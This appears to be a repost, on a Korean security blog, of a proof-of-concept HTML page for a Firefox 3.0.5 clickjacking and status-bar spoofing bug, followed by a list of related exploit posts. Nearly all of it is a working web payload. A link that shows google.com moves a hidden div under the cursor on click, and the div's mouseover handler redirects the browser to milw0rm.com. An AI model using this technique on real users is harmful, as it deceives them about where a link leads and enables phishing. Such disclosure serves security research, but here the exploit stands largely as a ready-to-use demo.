Firefox 3.0.5 Status Bar Obfuscation / Clickjacking
===========================================
<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.milw0rm.com';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Status Bar Obfuscation
/ Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">By MrDoug</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Click the VALID link to
google below to visit milw0rm.com</font><br>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Greetz to Slappywag</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Note this...<br>
| <br>
V
</font>
</div>
</body>
</html>
===========================================
'security > 해킹 보안' 카테고리의 다른 글
솔라리스 시스템 보안 [ 발표자료 ] (0) | 2009.05.26 |
---|---|
윈도우 서버 2008의 보안 기능 (0) | 2009.01.28 |
Barracuda Spam Firewall v3.5.11.020, Model 600 SQL Injection Vulnernability (0) | 2008.12.17 |
TmaxSoft JEUS Alternate Data Streams Vulnerability (0) | 2008.12.17 |
Realtek Sound Manager (rtlrack.exe v. 1.15.0.0) PlayList BOF Exploit (0) | 2008.12.17 |